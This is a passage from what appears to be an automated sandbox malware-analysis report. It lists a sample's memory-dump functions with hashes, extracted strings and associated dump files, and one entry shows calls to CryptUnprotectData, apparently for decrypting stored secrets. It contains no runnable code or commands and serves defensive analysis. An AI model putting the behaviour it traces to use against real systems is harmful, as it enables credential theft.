                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWide
                                    • String ID:
                                    • API String ID: 123533781-0
                                    • Opcode ID: b80ac3ae7c1699f1ad83f6a42e962e12f69efbfacd228f3e60aa0955bcb6ad75
                                    • Instruction ID: f9b0281809f18dcf017ca92cd475afa1642bbe427d6b5d2df0e3fbdfad26a03f
                                    • Opcode Fuzzy Hash: b80ac3ae7c1699f1ad83f6a42e962e12f69efbfacd228f3e60aa0955bcb6ad75
                                    • Instruction Fuzzy Hash: 9041F770A00A289FDB24DB59CC95F9BB7B5BB48702F4051D8E618E7290D7B1AEC5CF50
                                    Function 00BDA2B0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00BDA2D4
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00BDA2F3
                                    • LocalFree.KERNEL32(?), ref: 00BDA323
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
                                    • API String ID: 2068576380-0
                                    • Opcode ID: 7eef976df858dfedacd015d5d9933c7fdad160356581378ddc92f736401bbc3a
                                    • Instruction ID: a649ab7d31846eb7420eac35cf1322d7f4c71cd35a9d8644c057a7d5a43a7558
                                    • Opcode Fuzzy Hash: 7eef976df858dfedacd015d5d9933c7fdad160356581378ddc92f736401bbc3a
                                    • Instruction Fuzzy Hash: 1911E5B8A00209EFCB04DFA5D884AAEB7B5FB89300F104599ED15A7350E770AE54CBA1
                                    Function 01031E65 Relevance: 4.1, Strings: 2, Instructions: 1631COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: '^_l$8A]}
                                    • API String ID: 0-3149520042
                                    • Opcode ID: 688c3b043ac0a9b41735cb41af4e5e463b53807ae52869195c1eb30695b85225
                                    • Instruction ID: f6575643eba68c86561fb173d11ec862898a491fb5c223d877057d59cda4fc51
                                    • Opcode Fuzzy Hash: 688c3b043ac0a9b41735cb41af4e5e463b53807ae52869195c1eb30695b85225
                                    • Instruction Fuzzy Hash: 74B23AF360C204AFE704AE2DEC8577AB7E9EF94760F1A463DE6C4C3744E93598018696
                                    Function 010414A6 Relevance: 3.7, Strings: 2, Instructions: 1158COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Fz{$zG
                                    • API String ID: 0-2714076705
                                    • Opcode ID: dc10192a396c28943da4c1e03045d71f4d351dbbd2c901b9271b400c4d940de7
                                    • Instruction ID: 858c6265d5e6c3be0fc403d1af0b20a1444caca65f6253effbaecd4e848f6da9
                                    • Opcode Fuzzy Hash: dc10192a396c28943da4c1e03045d71f4d351dbbd2c901b9271b400c4d940de7
                                    • Instruction Fuzzy Hash: FC82D5F390C204AFE3046E2DEC8567AFBE9EF94720F16492DEAC4C3744E63599448696
                                    Function 0103AD7F Relevance: 3.5, Strings: 2, Instructions: 1017COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: f0:~$qD6x
                                    • API String ID: 0-907356682
                                    • Opcode ID: 051ed0f1c86ba35ca222fd93ef8c1f5aaba18e108f751d36a7b98b47bd4ed70a
                                    • Instruction ID: 35061654d7c5aca290a9cb280e58453c8d943a5b8963f919e3f1603ebbac3935
                                    • Opcode Fuzzy Hash: 051ed0f1c86ba35ca222fd93ef8c1f5aaba18e108f751d36a7b98b47bd4ed70a
                                    • Instruction Fuzzy Hash: 5A62E5F360C600AFE304AE2DEC95B6AF7EAEBD4320F1A453DE6C4C7744EA3558058656
                                    Function 00C44BA8 Relevance: 3.4, Strings: 2, Instructions: 941COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ?$__ZN
                                    • API String ID: 0-1427190319
                                    • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                    • Instruction ID: 02adca0b6ce956bdc87ef6214172bf4dfc1448d4843bf1b829f021007c9f4acb
                                    • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                    • Instruction Fuzzy Hash: 137213B2908B109FD718CF24C89076EBBE2BFD5310F698A1DF8A55B292D370DD459B81
                                    Function 00C25DB9 Relevance: 2.5, Strings: 1, Instructions: 1234COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: xn--
                                    • API String ID: 0-2826155999
                                    • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                    • Instruction ID: 3ba8d50a9c3ca9da1d677b6f7cd9a7843c0a96637918ed04c64eca23b949f241
                                    • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                    • Instruction Fuzzy Hash: 4AA215B1C042788AEF19CB68E8903FDB7B1FF45300F1842AAD4667BA81D7755E85DB60
                                    Function 00C24DC8 Relevance: 1.9, APIs: 1, Instructions: 411COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv
                                    • String ID:
                                    • API String ID: 3732870572-0
                                    • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                    • Instruction ID: df41859e04a9da25d1f6f089763bcd085bca673c9f2c098b5f98dc6c5203cafd
                                    • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                    • Instruction Fuzzy Hash: D3E1E0316083619FC728CF28D8807AFB7E2EFC9300F55492DE5D99B691DB31A955CB82
                                    Function 00C24868 Relevance: 1.9, APIs: 1, Instructions: 400COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv
                                    • String ID:
                                    • API String ID: 3732870572-0
                                    • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                    • Instruction ID: b5074ded280e3b70a26936d364b5516fb980bf2fafe515d16ec7465efa15cb48
                                    • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                    • Instruction Fuzzy Hash: CCE1F531A083218FCB28CF18D8817AEB7E6EFC5310F158A2DE8999B651D730ED45DB46
                                    Function 00C3E258 Relevance: 1.6, Strings: 1, Instructions: 383COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: UNC\
                                    • API String ID: 0-505053535
                                    • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                    • Instruction ID: e8cff10a81946ec73d1d7aa6326be3d20a8e7212fa56aed656a4657fc7175642
                                    • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                    • Instruction Fuzzy Hash: 75E16B71D142698EEB10CF59C8843BEBFF2AB85314F19C169D4B46B2D2D3358E46CB90
                                    Function 01004B94 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: &VO
                                    • API String ID: 0-1779305495
                                    • Opcode ID: f6abe4367bef0a887531dac892bbafab5b24e7fbbd72cff332c017b7e98f836f
                                    • Instruction ID: 444729763f9495bef5953345e45c8f0bd375cf41baf76b4aed9701b539ef3e67
                                    • Opcode Fuzzy Hash: f6abe4367bef0a887531dac892bbafab5b24e7fbbd72cff332c017b7e98f836f
                                    • Instruction Fuzzy Hash: 71714BF3B196005FF3049A2DDC8576ABBD7DBD8720F2B863CE688C3784E97858054256
                                    Function 00F54476 Relevance: 1.4, Strings: 1, Instructions: 164COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
